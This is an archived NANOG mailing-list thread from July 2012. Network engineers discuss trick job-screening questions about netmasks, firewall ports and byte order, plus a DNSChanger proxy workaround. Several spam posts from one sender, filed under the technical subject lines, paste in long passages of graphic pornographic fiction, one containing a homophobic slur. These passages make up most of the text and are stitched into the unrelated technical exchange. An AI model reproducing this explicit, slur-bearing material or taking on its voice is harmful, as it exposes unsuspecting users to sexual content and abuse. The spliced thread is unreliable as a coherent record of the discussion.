kmedcalf at dessus.com (Keith Medcalf) Date: Sat, 07 Jul 2012 18:44:11 -0600 Subject: job screening question In-Reply-To: Message-ID: <6287cebd84702948aa393809d67e39e0@mail.dessus.com> >"What's the problem with using 255.255.255.247 as a subnet mask if you >want to make a LAN subnet with 12 hosts?" > (5 word answer) Unemployment Office Is That Way -> Is the only 5 word answer I could come up with. The correct answer "invalid netmask", is only two words. > "What TCP destination port numbers should be allowed through the > perimeter stateful firewall device to and from a mail server whose > only purpose is to proxy SMTP mail from internal sources?" > (one number answer) Short Answer: There is no answer to the question that can be expressed in one number. Outbound connections to TCP destination port 25 only. Returning traffic (including associated ICMP) should be automatically handled by your stateful inspection firewall. If not, you need to buy a better firewall. Any applicant who provides any answer should the rejected out of hand as (a) being unable to read (b) being a threat to security. Unless, of course, you have misphrased the question. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From randy_94108 at yahoo.com Sat Jul 7 20:03:43 2012 From: randy_94108 at yahoo.com (Randy) Date: Sat, 7 Jul 2012 18:03:43 -0700 (PDT) Subject: job screening question In-Reply-To: Message-ID: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> .... > "When a number received in an IP packet is presented in > network byte > order,? and the host architecture is big endian, what > must be done to > convert the number into host byte order?" > (one word answer) My response would be to have a field-day with HR talking about MSB and LSB. Certainly wouldn't be a one-word answer. So HR disqualifies me? > > "What's the problem with using 255.255.255.247 as a subnet > mask if you > want to make a LAN subnet with 12 hosts?" > ? (5 word answer) My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. If you so desire, give me about 2 hours since I do not have a scientific calculator handy; and I will get back to you with the complete-list. Definitely not 5 words as required from the HR stand point. So I get disqualified again! ./Randy From jason.duerstock at gallaudet.edu Sat Jul 7 20:13:58 2012 From: jason.duerstock at gallaudet.edu (Jason Duerstock) Date: Sat, 7 Jul 2012 21:13:58 -0400 Subject: Running your own DNSchanger proxies In-Reply-To: References: Message-ID: As an intellectual exercise, I think this is interesting and worth the effort. As an actual implementation, I think it's more effective to block DNS traffic to the affected subnets. Let the breakage occur, and then let the end users get their broken machines fixed rather than let them continue hobbling along with this hack in place. Jason On Sat, Jul 7, 2012 at 8:10 PM, Cameron Byrne wrote: > On the other thread i read that some ISP are running their own proxies > for infected host. > > That sounded interesting, so i googled around to find out how to do > that and i could not find a HOWTO, so imagined up a solution myself, > tested it in VirtualBox, and wrote it down in case anyone finds it > useful or has another approach > > https://sites.google.com/site/cbyrne/dnschanger > > I don't plan to use this solution, but it was interesting to think > about and may be a good starting point in the unlikely event that some > VP pushes the panic button on Monday. > > CB > > From valdis.kletnieks at vt.edu Sat Jul 7 20:16:28 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Sat, 07 Jul 2012 21:16:28 -0400 Subject: job screening question In-Reply-To: Your message of "Sat, 07 Jul 2012 18:03:43 -0700." <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> Message-ID: <102262.1341710188@turing-police.cc.vt.edu> On Sat, 07 Jul 2012 18:03:43 -0700, Randy said: > > "What's the problem with using 255.255.255.247 as a subnet mask if you > > want to make a LAN subnet with 12 hosts?" > > (5 word answer) I'm not sure if that's a typo or excessive evil on the part of the questioner. ;) > My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. Yes, but even if it was *legal*, the "subnet doesn't contain 12 addresses" answer applies. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From nanog195 at yahoo.com Sat Jul 7 20:23:35 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Sat, 7 Jul 2012 18:23:35 -0700 (PDT) Subject: July DNS Message-ID: <1341710615.61091.YahooMailNeo@web142503.mail.bf1.yahoo.com> The guard?s face reddened again, and the veins in his thick neck stood out. ?I said take offyour pants, faggot!You can?t hide your tiny little cock any more!? Chris jumped back, startled, and James began to chuckle. Chris could feel a slow heat rising up from his neck. I?ll show this guy. ?You asked for it, asshole!? Chris grabbed his suspenders and tore them off his shoulders, letting the baggy black pants drop around his ankles. Before the guard could say anything, Chris grabbed the waistband of the sweats with one hand, and plunged the other in to wrap under the massive girth of his anaconda. He put his hand under the middle of his shaft, and twisted his whole body as he pulled upward, wriggling his nineteen inch limp cock out of his pants. He lifted it as best he could, and struggling, freed both of his huge, heavy balls from the sweats as well. Swinging free, the sheer weight threatened to almost throw him off balance, and Chris staggered around the room a bit, further unbalanced by the pants around his ankles. Chris clapped both hands on his thick cock and lifted it upward, waving it at the guard. ?There! Here?s my tiny dick that I was hiding! See how little it is! I?m sooo ashamed of having a tiny penis! If only I could be big like you, Officer James!? Chris swung his huge prick from side to side, reveling in the weight of his cock and balls. The guard stood stock still, eyes wide with amazement. He turned bright red, from his collar to the tops of his ears. He started to stammer. ?S-s-sir.. I?m really?I apologize?it was my mistake. I..? Chris cut him off, still holding his huge meat in both hands. ?It?s damn right it was your mistake! Your mistake messing with the biggest fucking dick on the planet! You?re lucky I don?t beat you senseless with my huge cock!? Chris could feel the blood surging into his prick, and felt it beginning to swell and thicken in his hands. Yeah! Thought youwere the big boy, did you! Wait till you see how big this boy gets! Suddenly, Tracy?s voice came through the door. ?James! What is going on in there?!? You?re just supposed to escort him to the office! Are you OK, sir? I?m coming in.? Chris heard her keys rattling at the lock. From kmedcalf at dessus.com Sat Jul 7 20:26:28 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Sat, 07 Jul 2012 19:26:28 -0600 Subject: job screening question In-Reply-To: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> Message-ID: > > "What's the problem with using 255.255.255.247 as a subnet > > mask if you want to make a LAN subnet with 12 hosts?" > > (5 word answer) > My response would be: Discontiguous subnet masks were allowed in the pre-CIDR > era. If you so desire, give me about 2 hours since I do not have a scientific > calculator handy; and I will get back to you with the complete-list. > Definitely not 5 words as required from the HR stand point. So I get > disqualified again! Hehehe. Ok. So if this was 1986 then the answer would be: No Hosts on the Network. There is only 1 host bit, and both available addresses would be reserved for the directed-broadcast and subnet-broadcast address respectively, leaving no space for an actual host, let alone 12 of them. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From nanog195 at yahoo.com Sat Jul 7 20:31:57 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Sat, 7 Jul 2012 18:31:57 -0700 (PDT) Subject: job screening question In-Reply-To: References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> Message-ID: <1341711117.19498.YahooMailNeo@web142504.mail.bf1.yahoo.com> Chris began to waddle slowly to his room, his huge, full balls hanging heavily between his legs. His flaccid anaconda had begun to swell again, and the added weight of his growing member was making it increasingly more difficult to move quickly. After his ungainly shuffle to the Tupelos, Chris was again faced with the challenge of getting up the stairs. While he had much more support than last time, and two free hands, his ballsack was even fuller and heavier, and his rod was slowly but insistently growing. Chris sighed and began the arduous climb up the stairs, as other boys passed him in both directions with annoyance. Swinging each leg up and around a package which easily weighed twenty five pounds or more was hard work. Chris was sweating by the time he reached the second floor. OK, so maybe I do get the food to go, and bulk up my balls after I get up the stairs. Chris shambled down the hall to his room, his groin growing heavier and more insistent with each step. By the time he reached the door, he was leaning forward with the increasing weight between his legs. He fumbled with the key until he got the door unlocked, and staggered into the room, pushing it closed behind him. Gotta get these pants off, now!Chris slipped off the suspenders and let his baggy pants drop to the ground. He hobbled across the room with the pants around his ankles, towards his bed. He eased off each shoe with the other foot, and the loose pants slipped off as well. Chris winced as he pulled the waistband of the spandex down over his stiffening cock and swollen balls. Trying to get the spandex off as his python continued to grow was an exercise in frustration. Finally, both his full, massive nutsack and his thickening cock were both free. Chris hefted his balls onto the bed and sighed in relief. Whoooo. Heavy.His colossal rod, now resting comfortably between his nuts, continued to grow, now quickly swelling free from confinement. Chris patted it fondly. Oh, yeah?Grow big for me.With his meat resting on the bed, Chris had an idea. He stepped carefully around his bed, keeping his huge manhood supported on the mattress. He reached over and snagged one of the laundry bags, and, leaning far forward, slid the bag over his throbbing cock. Chris slid the smooth fabric down his huge girth, the sensation driving him wild. Then he pulled the drawstring taut at the base of his shaft. Hopefully this will keep the cleanup to a minimum. Then, standing at the foot of the bed, Chris climbed onto his bed on his knees, sliding his hard cock along the bed in front of him. His gigantic sack flopped against his thighs, and his dick bumped gently across the sheets, driving him wild. Chris stopped and reached forward for his pillows. He sandwiched his thirty inch monster between his pillows, resting it on one, and squeezing the other pillow firmly across the top of his shaft. A substantial portion of his fuckstick protruded beyond the pillows. Damn! I should have bought two body pillows for this.Chris leaned forward, pressing down on the sides of the pillows, clamping his prick between them. Chris began to pump his hips, fucking his pillows. The laundry bag was smooth enough to allow his cock to slide back and forth, and the pressure he exterted was like a firm grasp all over a foot or more of his dick. Unh! Feels pretty good.Chris began to pump harder, thrusting his hips harder and sliding as much of his meat between the pillows as he could. Unh, Uhn. Yeah. This feels goooood.As his pleasure built up towards climax, Chris began thrusting as fast as he could, feeling his huge sack slap against his thighs with each thrust. ?Unnnnnnh!? The first flood of cum surged out of his cock, and Chris could feel its warm wetness oozing around the head of his dick. Ohhh, yeah.He continued to thrust as his huge organ pumped out more and more jizz. Each eruption of cum gushed out of his massive cock and spattered into the bag. A dozen or more surges later, Chris?s orgasm subsided. The laundry bag was sloshing with a pint or more of Chris?s spunk.The fabric seemed to be containing it well, though, and there was no signs of leaking. Chris?s gigantic prick, however, was still achingly erect and throbbing. His colossal balls, swinging heavily from his groin, were still bloated with an almost full load, and he felt no urge to slow down. No sooner than his first orgasm had subsided, Chris resumed thrusting his thick shaft between the pillows. The cum-spattered bag was now warm and wet and his arousal hadn?t diminished a bit. Chris spread his legs a bit wider and exulted in the feeling of his gargantuan nutsack swaying heavily back and forth, gently brushing the covers. His first flood of cum was soon followed by a second, equally enormous series of ejaculations. Now the bag was filled with a quart or more of hot semen, but Chris didn?t feel the slightest bit sated. I might as well just enjoy myself until Jen gets here. She wanted to help me get to my biggest, so I shouldn?t be too big when she gets here.Without even a pause after his climax, Chris began thrusting again, losing himself in the sensations from his giant cock. He didn?t even notice when the door opened, then closed, behind him. Chris had his legs spread wide apart and was furiously fucking the paired pillows with his wrapped prick. Between the warm, wet fluid in the bag, and the delicious feeling of his fat balls bouncing first against the pillows, then against his thighs, Chris was completely oblivious. His eyes were closed and he was fantasizing about an entire array of erotic images: ? ? ? Sitting in his class with the two lesbians, wearing a stretchy pair of sweat pants instead of his baggy black pants, and slowly popping a monstrous boner as they stared in rapt fascination. Sliding his massive rod between Jen?s breasts, which had somehow swelled to the size of large beachballs, yet remained round and bouncy. Being jerked off by Jen and Tasha and Kimber, their eager hands and soft mouths delighting in his ample cock, the girls laughing as they shared their prize. Striding into the dorm shower room totally nude with a full erection, as Javier, Kevin, and the other jocks from the stairwell watched with awe, stroking himself to orgasm after orgasm in the shower in front of them. Barbie, totally nude in the snack shop, licking his oversized cock head with gusto while she spoon-fed him from an endless cup of creamy milkshake. Tracy, clad only in her red Target shirt, astride his huge dick, masturbating him with her hands and legs on top of the customer service counter. Greg and Terry and Javier, urging him on, cheering, as he drenched a cowed and subdued James with a limitless supply of thick, sticky jizz. Persephone, insatiable, gorging herself not on food, but on the delicious supply of cum from his swollen balls, her stomach bulging with the vast quantities she had devoured. Jen, wide eyed and adoring, murmuring to him as she kissed him, ?Get big for me, Chris. Get big. Get bigger. Get bigger.? Seemingly inexhaustible, Chris jerked himself off to a third massive orgasm, then a fourth, and a fifth, and finally, a sixth. With each climax, the bag grew fuller and fuller as his nuts pumped out a flood of spunk. Though Chris never noticed, lost in his pleasure, at some point before his sixth and final ejaculation, the door to the room opened again and closed behind him. By the time he collapsed, exhausted, onto his bed, the laundry bag was filled with over a gallon of his thick, sticky seed, and his fat balls had shrunk in mass to about half their maximum weight. Whew! I need a breather! Chris rolled to one side, feeling the heft of his cock and balls pulling against his body as he did so. As he patted them contentedly, his cell phone, on the dresser, rang loudly. ? ? ? Part 63. Chris tumbled out of his bed, his softening cock flopping against his legs. He struggled to hurry over to his phone with his bulky genitals swinging between his legs. He grabbed the phone and blurted ?Hello?? ?Hey, sweetie pie! How is my big boy doing? Have you been a good boy, today?? It was Jen, her voice bubbly and curious. ?Jen! Hey! I was just thinking about you!? And Persephone, and Tracy, and Tasha, and Kimber, and Barbie? ?Wait. How did you get my number? Uh, not that I mind, but?? ?You called the pizza place, remember? The system captures all the phone calls to the store, silly.? She snorted. ?Either that or I Googled ?biggest cock in the world?, and there you were on Wikipedia. Now, tell me that you haven?t been pigging out. I?ve been thinking all day about watching you get bigger, and what I wanted to do when you were at your very, very biggest for me.? Jen?s voice was very husky. ?No! I?m starving! I can?t wait to eat something. I?m dying to see you.? I?ll just tactfully omit the last few hours on that. I am starving right now, so that part is all true. ?Oh, sweetie! I?m dying to see you too. I?m headed back home from school. I?ll just stop and pick you up, if that?s okay.? Chris indicated his acquiescence. ?Chris, is there any chance I might get you to wear your sweats instead of your baggy pants? Or maybe something a little tighter??, Jen asked eagerly. Chris was flummoxed. He wanted to make Jen happy, but he was really not looking forward to showing off his oversized prick on campus. ?Uh, I don?t really have anything else that fits, Jen. I can wear some of my spandex leggings under the pants for you. Those are really, really tight. Would that be OK?? ?Sweetie, I know you are self-conscious about your size, but you should be showing it off to the whole world, not just little ol? me. Anyway, it?s not like I?m going to parade you around town just yet. It would just be the two of us at my apartment with my roommates.? ?With Tasha and Kimber?? Chris couldn?t help himself. ?Really?? ?Well, yeah. I mean, it?s not like I can just bundle you into the apartment and smuggle food into my bedroom for you. Tasha and Kimber live there, too. They?re gonna want to actually meetyou eventually. I might be able to get away with dragging a boy into the boudoir a few times, but having him over for dinner? Introductions are in order, sweetie pie.? ?Oh, yeah. I guess that makes sense.? Despite his earlier fantasies, Chris was now experiencing a bit of anxiety about being revealed to Jen?s roommates. ?It?s just that I?don?t have a second pair of sweat pants. I usually wear those baggy black ones.? ?Chris, sweetie, three things. First, those aren?t your sweat pants. You might have gone to Belmont High, but you weren?t on the lacrosse team.? Oh, right. Team name on the leg, Chris noted as he looked at the sweatpants strewn on the floor. Glad I?m dating Nancy Drew. Jen continued, ?Second, I said I wanted to seeyou get to your biggest. I can?t watch those gorgeous balls get all fat and firm if you?re hiding them in your pants. Mmmm, I?ve been thinking about that alllll day.? Me too! thought Chris. However, he asked, ?What was the third thing?? Jen stammered for a second, seemingly interrupted in her train of thought. ?Uh, er, oh, the third thing is I?m not having my roomies think I?m dating a Goth. You have to look normal for them.? ?Jen, if I can stay soft around you, I?ve got a nineteen inch long dick, and you want to feed me until my balls get back to ten pounds apiece. I?m not going to look normal.? ?Sweetie, I said youhad to look normal. Your wiener can be its usual, jaw-dropping, eye-popping, mouth-watering self. Now, let?s compromise: you put on your Goth camouflage, and grab a pair of sweats from your roomie. You can come over to the apartment in steath mode, but once you?re over here, I want your package on display. The girls will flip out.? Jen?s voice sounded like she would brook no argument. ?Okay. That?s fair.? I?m not about to say no to a girl who is not only crazy about my big cock, but who wants to help keep my balls nice and full. Especially not when she looks like Jen.?When will you be here?? ?Sweetie pie, if it wasn?t stupid to talk on the cell and drive, I?d already be there. I?m sitting in my car on my campus right now. It will be like, ten minutes, tops. Will you meet me outside, or should I come in and help you lug that monster down the stairs?? Ten minutes? Fuck! I?m naked and I?ve got a laundry bag with a gallon of cum in it to get rid of. Crap! Do I have some homework to do??Ten minutes should be fine, Jen. I?ll be waiting. I can?t wait to see you.? ?There?s a lotof stuff I can?t wait for, sweetie. See you soon!? Jen hung up the phone. Chris sprung into action, as best he could with a massive limp penis and two huge balls swinging between his legs. He grabbed the bag and carried it over to the sink in the room. OK, this is more than a gallon.He turned on the hot water fairly high, and started to pour the sticky, gloppy mass of jizz down the drain. He thought that he was about to clog the sink several times, but finally the entire load of cum had drained away. Chris turned the bag inside out and scrubbed the semen off the fabric, then hung it on the towel rack to dry. He looked at the clock and panicked. Shit! Do I have time to stuff myself into some spandex? He waddled across the floor, his huge package slapping against his legs with each step. Chris grabbed the spandex he had worn earlier and began maneuvering himself back into the garment. At least this one is stretched out a bit. Not quite as hard to get into the second time.Once his manhood was restrained by the spandex, Chris pulled on a shirt, then stepped into his baggy black pants, and hooked the suspenders over his shoulders. He put back on his shoes, and started for the door. Wait a minute! Damn!Chris opened Greg?s dresser guiltily and grabbed another pair of his roommate?s sweat pants. He then grabbed his laptop too. I?m not sure if I?ll actually get any time to work on homework, but it?s the thought that counts. Speaking of thoughts?Chris grabbed another of the laundry bags, too. Chris stepped out of the room and immediately almost ran into Javier. ? ? ? Part 64. ?Hey, man! How?s it hanging?? Javier greeted him exuberantly, grabbing Chris?s free hand in a shake while clasping his shoulder with his own free arm. Javier was wearing a tight white T-shirt which showcased his muscles through the thin material, and a pair of skin-tight jeans whose button fly was strained over his prominent bulge. ?I haven?t seen you around. I?ve seen bothyour roomates, though, man. That shit?s rough.? He adjusted his package unselfconsciously. ?I thought I could satisfy the ladies, but that Terry? Damn! Greg could catch some tail too, if he was interested. Am I right?? Javier playfully punched Chris in the arm. ?I thought my roommate had it bad. He only has to live with oneguy all the girls are drooling over.? Javier paused at Chris?s expression. ?Hey, man, I didn?t mean nothing by it. I was just kidding. Is Greg here? We were supposed to meet up after class.? Chris made a conscious effort to wipe the impatient look from his face. ?Sorry, Javier. I don?t know where Greg is. I?m not angry. I?m just late. I?m supposed to be meeting my girlfriend.? Chris blurted the last sentence out without thinking, and Javier?s face broke into a surprised smile. ?No shit, man? Hell, you work almost as fast as Terry! Lemme get out of your way, Chris. I?m sure you?d rather be hanging with your girl than standing around in the hall with me.? He patted Chris on the shoulder as he let him pass. ?Go get her, bro.? Chris waddled down the stairs with his thick flaccid cock and big balls snugly held by his spandex underpants. While his nuts were still huge in comparison to anyone else?s, his recent session had drained them substantially, and they didn?t sway and bounce nearly as much as they had going up the stairs. Plus, the anticipation of seeing Jen again was lending speed to his step. That Javier is pretty friendly for a guy I only met once in the showers. He seems cool, though. I feel kinda bad for him in a way. I guess he got used to being ?big?, and then came to school here. It seems like word has really gotten out about Terry?s size. It?s too bad he doesn?t have any more cream. It would be cool to help Javier get up to about Terry?s size, so he didn?t have to feel self-conscious about it. Not my size though. I wanna be the biggest around. I don?t want anybody even getting closeto my size. Probably for the best that I used up all the cream. Chris stepped outside and saw Jen getting out of her car at the curb. ?Jen! Hey, Jen!? He waved at her and she waved back. ?I?m coming!? Chris started to run, then quickly caught himself. No more running with this monster.He settled for quickening his pace down the sidewalk towards her. As he did, she walked around the side of her car and waited for him. When Chris drew near, she spread her arms eagerly. ?Hey, sweetie! What took you so long?? Jen wrapped her arms around his neck and pulled him to her in a kiss. Chris responded by grabbing her around the waist, almost dropping his laptop in the process. Their mouths opened and her kiss grew into a protracted affair, their tongues lapping together. Jens? arms released their hold on his neck, and moved down to wrap around his waist, then his butt. Her arms pulled him tight against her, and Jen ground her pelvis against his massive cock and balls. ?Ooooh, I missed this sooo much,? she gasped out after their lip lock. Chris could feel himself already start to harden. ?I thought we were going to watch me get bigger at your place.? His hands, contradicting his words, sought out her firm, curvy butt and pulled her tight against his groin. Jen?s moist mouth sought out his for another long kiss, exploring his mouth with her tongue. She finally pulled out of the kiss and breathed softly into his ear, flicking his earlobe with her hot, pink tongue. ?We are. I was just saying hello.? She continued to grind her pelvis against Chris, his anaconda starting to strain against the spandex as it swelled. She abruptly pushed him back firmly, though not rudely. Chris?s slightly hard rod pressed against the baggy pants, his semi-erection quite visible. ?I just wanted to point out that if I wantedto parade you around, it would be pretty easy to do, no matter what disguise you wore.? She smiled sweetly at him and batted her lashes. ?Now, would you like to show that boner off to all the boys, or get in the car?? She?s got me there.Chris put his laptop, sweats, and bag in the back seat, then struggled to get seated in the front. His huge rod, though not anywhere near maximum size, was preventing him from getting a comfortable position. Jen giggled at his predicament, then helped him slide the seat back to where he could, at least, sit down without discomfort. ?Give me a little more time and we?d have to tie your monster down to the roof like a Christmas tree, Chris.? ?Not really. I?d just get in the back seat and let it ride up here with you,? he replied, laughing. This time, Jen drove back to her apartment at a more sensible speed. They pulled in to a parking spot, and Jen helped Chris get his stuff out of the back seat, along with her own messenger bag. She looked at the laundry bag and gave Chris a questioning glance. ?To avoid soaking your sheets like last night,? he explained. ?Oh, good. I was thinking that you were sorely mistaken if you were hoping to get me to do your laundry. You didn?t bring it; and it?s not happening anyway.? ?No, nothing like that. I?m thinking that I probably need to help youwith laundry tonight, considering what happened last night. Now, how am I going to get up to the room?? Chris pointed at his erection, which, although nowhere near its full size, was pressing visibly against the baggy black pants, creating a large tent in the fabric. ?Easy-peasey, sweetie pie. We just cuddle on the way up.? Jen fitted action to words, and pressed her pert butt against his shaft, wrapping his arms around her. Chris could feel his monster stirring again, growing and straining against the spandex confinement. ?Uh, Jen? I don?t know how long that?s gonna work. You feel a little too good for me to stay calm.? Plus, if this spandex gets much tighter, my eyes are going to start bugging out. ?Well, then, we?d better just hurry.? Jen?s curvy ass bounced against his rod all the way into the elevator. Chris groaned in discomfort once they were there, leaning back against the wall and trying to adjust his pants to give him just a little more room. His fat python was at least twenty four inches long now and had grown well past his right knee. The thick shaft was clearly outlined, even in the previously baggy pants. ?What are we going to do about Tasha and Kimber? I don?t want to have dinner with them at full mast.? ?Aw, I was hoping to use it as a sideboard for the buffet.? She patted his penis fondly. ?You hustle into my room as soon as we get in. I?ll run interference. I?ll have to start dinner; it?s my night to cook. While I?m doing that, you can let off some pressure in the bedroom, okay? When you get yourself back down to a size appropriate for polite company, put on your sweats and come out. I?ll tell Tasha and Kimber you had some homework you had to knock out first.? ?Uh, Jen, if I jerk off more, I?m gonna be even hungrier. I don?t know if you really realize how much I need to eat to keep myself stoked. It?s not normal.? Chris?s stomach rumbled, reminding him. The elevator doors opened and Jen jumped in front of him again, mashing her butt into his groin. He sighed with pleasure and wrapped his arms around her waist. ?Sweetie, I?ve delivered pizza for you before. I?ve got gobs of pasta and bread, plus plenty of side dishes, and desert. There?s a load of snacks in the cupboard, plus we just bought ice cream last night. If all fails, I can always order more pizza. Trust me, those big balls of yours are gonna be as full as I can possibly get them.? She opened her door and pushed Chris towards her bedroom as she hopped into the living room in front of Tasha and Kimber, dropping her messenger bag and Chris?s bundle. ?We?re here! Lemme get dinner started. I hope you guys like baked spaghetti!? Chris waddled down the hall, his growing rod preventing him from bending his right leg. He heard the girls behind him as he stepped into Jen?s room. ?Where?s Chris going?? asked Tasha. ?Yeah, what?s his rush? He didn?t even say ?Hi?,? Kimber complained. ?He has some homework he has to jump right on,? Jen explained. ?It has to be submitted tonight, so he needed to get it taken care of immediately. He?s gonna tackle it with both hands, and then he will be able to relax and have dinner with us.? Chris shut the door behind him, cutting off their voices. He kicked off his shoes and nearly tore off his pants, desperate to get the too-snug spandex off his protesting prick. He finally was able to shuck off the spandex and his dick sprung up enthusiastically, rapidly ballooning to its full colossal size now that it was free of the fabric prison. Chris walked across the room to Jen?s closet, his monstrous pole bobbing with each step, and grabbed first one, then a couple, of her towels. Ah, I?m doing laundry anyway.He seated himself comfortably on her bed and, wrapping the towel over his cock head, began to stroke himself eagerly. Wait a minute. I?m forgetting something. Chris laid back and reached into Jen?s bedside table, grabbing a bottle of Astroglide. He opened it and began squirting it liberally all over his tremendous shaft. Only the best for the biggest.Once his entire girth was coated with the lube, Chris clasped his cock with both hands and began stroking himself even more enthusiastically. Man! I?m so horny! It?s been?less than half an hour, actually. I guess I just need it more now. Feels soooo good.He abandoned himself to the pleaure, immersing himself in his task. He didn?t hear the girls talking in the other room. ? ? ? Part 65. Jen was working on her baked spaghetti as she lectured her roommates. ?Look, this is really important. Chris is self-conscious about his appearance. He?s at a new school in a new city, and he doesn?t want to stand out. I don?t want you guys making a big deal about it, OK?? ?Wait? He doesn?t want to stand out, but he dresses like a Goth with those huge baggy pants??, objected Kimber. I thought that was the point of Goth wear, to stand out as a Goth. I mean, it?s pretty obvious, especially ?cause he?s Asian. I?ve never seen a Goth Asian guy before.? ?Yeah. I never though I would see you dating a Goth. I though you said they reminded you of Eddie Munster.? Tasha chimed in, helpfully. ?He?s nota Goth! He wears those big baggy pants to hide the fact that he?s?He?s?He is?? Jen was at a loss as to how to explain this delicately. ?He?s what??, asked Tasha. ?Arrrgh! He has a really big penis, okay?? Jen just blurted it out. Both Kimber and Tasha perked up immediately. ?His whole package is gigantic, all right? It?s like freakishly, unbelievably massive. He wears the baggy pants to hide the fact that he?s huge.? She focused on preparing the food and tried to avoid their gaze, blushing furiously. ?I knew it!? Tasha jumped around the kitchen. ?I knew you liked guys that were totally hung! Whenever we were watching porn, you always acted like you weren?t staring when the really big studs were on screen, but I knewyou were staring at them. So, Chris is hung like those guys? Wow! Do you think he would let us see it?? Kimber grabbed a kitchen towel and snapped it at Tasha?s butt. ?Would you shut up? Just because you are fixated on pics and videos doesn?t mean that everyone is. Anyway, you would know that Jen had a thing for well-endowed guys if you ever listened to her talk about Todd.? ?Who??, asked Tasha, rubbing her butt. ?Todd, the guy she dated when she was a senior in high school. Jen complains about what a spineless creep he was, but she dated him all year. She said he was ?pretty big? more than once, so she must have been willing to put up with him for that. Is Chris as big as Todd was, Jen?? Jen snorted out loud. ?Ha! As if! Chris is over twice as big soft as Todd ever was, hard!? Am I really that transparent about my size fetish? I thought I hid it pretty well. ?Hang on, that doesn?t make sense.? Tasha scrunched up her face, remembering. ?When we were partying Friday before last, you said that your ex was almost nine inches. If Chris is twice as big soft, he would be eighteen inches long before he had a hard on. Did you mean that Chris is twice as big hardas Todd was soft? No, that doesn?t sound very impressive. I?m confused.? There was no way around it. Jen bit the bullet. ?I meant what I said. Chris is over twice as big softas Todd was hard. He?s nineteen inches.? Both Tasha and Kimber erupted in unison. ?No freaking way!? ?You have to be kidding. That?s impossible,? said Kimber, shaking her head. ?Pics or it didn?t happen!?, cried Tasha. ?No! No pics! No questions! No staring! ? Jen waved the wooden spoon in warning. ?I told you; he?s really shy about this. I don?t want to have to smuggle him past you guys each time we come in. He?s going to come out here and have dinner and hang out with us. Nobody?s taking pictures of him, orvideo, Tasha, and nobody?s posting about it on their blog, or Facebook, or Twitter. I mean it, Kimber. If you make one tweet about this, I will never forgive you.? She took a deep breath. ?I like Chris, and I want him to feel like he can be himself with me, and not put on an act like he has to on campus, okay?? Both girls reluctantly nodded their acquiescence. Oh, crap. I forgot to mention the other thing. Jen turned back to her roommates. ?There?s just one other thing.? ?What now?? cried Kimber. ?He has twothings?!?? exclaimed Tasha, shortly before Kimber snapped the towel at her again. ?Chris not only has a really big penis, but his testicles are really big, too. They are large normally, but when he hasn?t ?expressed? himself for a while, they get enormous. Please don?t tease him about it, okay?? She looked to her roommates for their agreement. ________________________________ From: Keith Medcalf To: "nanog at nanog.org" Sent: Saturday, July 7, 2012 6:26 PM Subject: RE: job screening question > > "What's the problem with using 255.255.255.247 as a subnet > > mask if you want to make a LAN subnet with 12 hosts?" > >? (5 word answer) > My response would be: Discontiguous subnet masks were allowed in the pre-CIDR > era. If you so desire, give me about 2 hours since I do not have a scientific > calculator handy; and I will get back to you with the complete-list. > Definitely not 5 words as required from the HR stand point. So I get > disqualified again! Hehehe.? Ok.? So if this was 1986 then the answer would be: No Hosts on the Network. There is only 1 host bit, and both available addresses would be reserved for the directed-broadcast and subnet-broadcast address respectively, leaving no space for an actual host, let alone 12 of them. --- ()? ascii ribbon campaign against html e-mail /\? www.asciiribbon.org From jlewis at lewis.org Sat Jul 7 20:34:59 2012 From: jlewis at lewis.org (Jon Lewis) Date: Sat, 7 Jul 2012 21:34:59 -0400 (EDT) Subject: job screening question In-Reply-To: <102262.1341710188@turing-police.cc.vt.edu> References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <102262.1341710188@turing-police.cc.vt.edu> Message-ID: On Sat, 7 Jul 2012 valdis.kletnieks at vt.edu wrote: > On Sat, 07 Jul 2012 18:03:43 -0700, Randy said: >>> "What's the problem with using 255.255.255.247 as a subnet mask if you >>> want to make a LAN subnet with 12 hosts?" >>> (5 word answer) > > I'm not sure if that's a typo or excessive evil on the part of the questioner. ;) > >> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. > > Yes, but even if it was *legal*, the "subnet doesn't contain 12 addresses" answer applies. ;) It's just a mask...you can do all sorts of crazy things with netmasks. The results of using "unusual" ones is not typically predictable or desireable to those who might accidentally use them. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From nanog195 at yahoo.com Sat Jul 7 20:36:41 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Sat, 7 Jul 2012 18:36:41 -0700 (PDT) Subject: job screening question In-Reply-To: References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <102262.1341710188@turing-police.cc.vt.edu> Message-ID: <1341711401.28188.YahooMailNeo@web142502.mail.bf1.yahoo.com> As his monstrous dick began to balloon up to its full length and girth, Chris noticed it start to poke out of the shower stall. Holy crap! I?m too big to fit in the shower!Chris quickly leaned back against the shower wall and cradled his cock in both hands, lifting the massive shaft upwards rather than outwards. That?s a good cock. Too big for the shower. Such a good cock. Mmmmm.Chris spread his legs wide to let his balls sway freely between them. He squirted more body wash on his giant rod and slipped his hands up and down the length. Chris bit his lip with the incredible pleasure he was experiencing. Though the girth of his cock was too great for him to reach around it, even with both hands, Chris clutched the shaft as best he could and began to pump it vigorously, thrusting with his hips. The extra motion allowed him to slip a full twenty four inches of his dick between his hands on each stroke, and the thrusts caused his weighty sack to sway pleasurably between his legs. ?Unh! Unh!? Chris began to grunt softly in pleasure. ?Oh, yeah.? Chris heard a voice echoing softly across the tiled room. Somebody else is in here! I didn?t hear them come in. What the h? 